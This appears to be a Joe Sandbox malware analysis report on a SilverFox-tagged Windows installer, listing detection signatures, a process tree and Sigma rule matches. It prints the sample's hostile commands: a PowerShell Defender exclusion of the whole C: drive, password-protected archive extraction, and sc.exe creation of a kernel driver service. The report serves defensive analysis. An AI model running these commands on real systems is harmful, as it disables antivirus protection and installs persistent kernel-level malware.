Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.5.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
renamed because original name is a hash value
Original sample name:_2.0.5.exe
Analysis ID:1579694
MD5:c17bd872bfa6b9e26aa03ad02ceaaca0
SHA1:a2cc5d1e3526ad5b415ba875b12e1e42d48411ce
SHA256:43a0b8a907d46b77e8695c8c00f90a6812f9bdb138d2ae53c1ce0d9b4362e610
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.5.exe (PID: 768 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" MD5: C17BD872BFA6B9E26AA03AD02CEAACA0)
    • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PID: 6032 cmdline: "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 3568 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2772 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.5.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT MD5: C17BD872BFA6B9E26AA03AD02CEAACA0)
        • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PID: 3772 cmdline: "C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$30412,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 3684 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6212 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5272 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6600 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2848 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4936 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5372 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1992 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3228 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3756 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 356 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2344 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2340 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6344 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 60 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3756 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5204 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4136 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7096 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3284 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3276 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3352 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4464 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4200 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7000 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7092 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5500 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 356 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7108 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7008 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1508 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2352 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5428 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6776 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 6032, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5272, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6600, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 6032, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5272, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6600, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 6032, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 10%Perma Link
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeVirustotal: Detection: 8%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.2% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.1550924989.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.1550847522.0000000003970000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C68AEC0 FindFirstFileA,FindClose,FindClose,7_2_6C68AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00826868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00826868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00827496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00827496
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
